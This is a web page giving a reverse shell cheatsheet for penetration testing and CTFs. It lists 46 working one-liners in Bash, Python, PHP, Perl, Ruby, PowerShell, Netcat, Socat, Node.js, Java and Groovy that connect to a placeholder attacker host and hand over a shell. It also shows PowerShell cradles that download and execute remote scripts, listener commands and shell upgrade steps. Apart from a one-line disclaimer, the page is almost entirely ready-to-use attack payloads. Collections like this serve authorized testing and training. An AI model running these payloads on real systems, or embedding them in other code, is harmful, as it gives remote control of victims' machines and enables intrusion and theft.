Reverse Shell Cheatsheet

Reverse shell cheatsheet for security testing. Covers Bash, Python, PHP, Perl, Ruby, PowerShell, Netcat, Socat, and more with listener setup and shell upgrade techniques

Related Categories:Security

⚠️ This cheatsheet is for authorized security testing, CTF competitions, and educational purposes only. Unauthorized access to computer systems is illegal.

46 commands

Bash TCP

Bash TCP reverse shell

bash -i >& /dev/tcp/LHOST/LPORT 0>&1

Bash UDP

Bash UDP reverse shell

bash -i >& /dev/udp/LHOST/LPORT 0>&1

Bash exec

Bash exec reverse shell

exec 5<>/dev/tcp/LHOST/LPORT; cat <&5 | while read line; do $line 2>&5 >&5; done

Bash fifo

Named pipe reverse shell

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT > /tmp/f

Bash -c

bash -c wrapper

bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'

Python3 socket

Python3 socket reverse shell

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Python3 PTY

Python3 PTY reverse shell

python3 -c 'import socket,subprocess,os,pty;s=socket.socket();s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

Python2 socket

Python2 socket reverse shell

python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Python3 short

Python3 short version

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("LHOST",LPORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'

Python Windows

Python Windows reverse shell

python3 -c 'import socket,subprocess;s=socket.socket();s.connect(("LHOST",LPORT));subprocess.call(["cmd.exe"],stdin=s,stdout=s,stderr=s)'

PHP exec

PHP exec reverse shell

php -r '$sock=fsockopen("LHOST",LPORT);exec("/bin/sh -i <&3 >&3 2>&3");'

PHP proc_open

PHP proc_open reverse shell

php -r '$sock=fsockopen("LHOST",LPORT);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'

PHP shell_exec

PHP shell_exec reverse shell

php -r '$sock=fsockopen("LHOST",LPORT);shell_exec("/bin/sh -i <&3 >&3 2>&3");'

PHP passthru

PHP passthru reverse shell

php -r '$sock=fsockopen("LHOST",LPORT);passthru("/bin/sh -i <&3 >&3 2>&3");'

Perl socket

Perl socket reverse shell

perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in(LPORT,inet_aton("LHOST")));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

Perl IO

Perl IO reverse shell

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"LHOST:LPORT");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>'

Perl bash exec

Perl bash exec reverse shell

perl -e 'use Socket;$i="LHOST";$p=LPORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("bash -i");};'

Ruby socket

Ruby socket reverse shell

ruby -rsocket -e'f=TCPSocket.open("LHOST",LPORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Ruby fork

Ruby fork reverse shell

ruby -rsocket -e'exit if fork;c=TCPSocket.new("LHOST",LPORT);loop{c.gets.chomp!;(exit! if $_=="exit");IO.popen($_,"r"){|io|c.print io.read}}'

Ruby IO.popen

Ruby IO.popen reverse shell

ruby -rsocket -e 'c=TCPSocket.new("LHOST",LPORT);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

PS TCP client

PowerShell TCP client

powershell -nop -c "$c=New-Object Net.Sockets.TCPClient('LHOST',LPORT);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([Text.Encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()"

PS Base64

Base64 encoded payload

powershell -e <BASE64_ENCODED_PAYLOAD>

PS download cradle

Download cradle

powershell IEX(New-Object Net.WebClient).DownloadString('http://LHOST/shell.ps1')

PS ConPTY

ConPTY shell

IWR -Uri http://LHOST/Invoke-ConPtyShell.ps1 -OutFile cps.ps1; Import-Module ./cps.ps1; Invoke-ConPtyShell LHOST LPORT

nc -e

Netcat -e option

nc -e /bin/sh LHOST LPORT

nc without -e

Netcat without -e

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f

ncat SSL

Ncat with SSL

ncat --ssl LHOST LPORT -e /bin/sh

nc Windows

Netcat Windows reverse shell

nc.exe LHOST LPORT -e cmd.exe

Socat TCP

Socat TCP reverse shell

socat TCP:LHOST:LPORT EXEC:/bin/sh

Socat TTY

Socat full TTY reverse shell

socat TCP:LHOST:LPORT EXEC:'bash -li',pty,stderr,setsid,sigint,sane

Socat SSL

Socat SSL reverse shell

socat OPENSSL:LHOST:LPORT,verify=0 EXEC:/bin/sh

Node child_process

Node.js child_process

node -e '(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/sh",[]);var c=new net.Socket();c.connect(LPORT,"LHOST",function(){c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c);});})();'

Node require exec

Node.js require exec

require('child_process').exec('nc -e /bin/sh LHOST LPORT')

Node ES6

Node.js ES6 version

node -e 'const{Socket}=require("net"),{spawn}=require("child_process");const s=new Socket();s.connect(LPORT,"LHOST",()=>{const p=spawn("sh");s.pipe(p.stdin);p.stdout.pipe(s);p.stderr.pipe(s)});'

Java Runtime

Java Runtime exec

Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/LHOST/LPORT 0>&1"});

Java ProcessBuilder

Java ProcessBuilder

new ProcessBuilder(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/LHOST/LPORT 0>&1"}).start();

Groovy

Groovy reverse shell

String host="LHOST";int port=LPORT;String cmd="bash";Process p=["bash","-c","bash -i >& /dev/tcp/$host/$port 0>&1"].execute()

nc listener

Netcat listener

nc -lvnp LPORT

ncat SSL listener

Ncat SSL listener

ncat --ssl -lvnp LPORT

socat listener

Socat listener

socat TCP-LISTEN:LPORT,reuseaddr FILE:`tty`,raw,echo=0

socat SSL listener

Socat SSL listener

socat OPENSSL-LISTEN:LPORT,cert=cert.pem,verify=0 FILE:`tty`,raw,echo=0

Python PTY spawn

Python PTY spawn

python3 -c 'import pty;pty.spawn("/bin/bash")'

Script PTY

Script PTY

script -qc /bin/bash /dev/null

Stty raw

Set TTY to raw mode

stty raw -echo; fg

Export TERM

Set TERM variable

export TERM=xterm-256color

Stty size

Set terminal size

stty rows 50 cols 200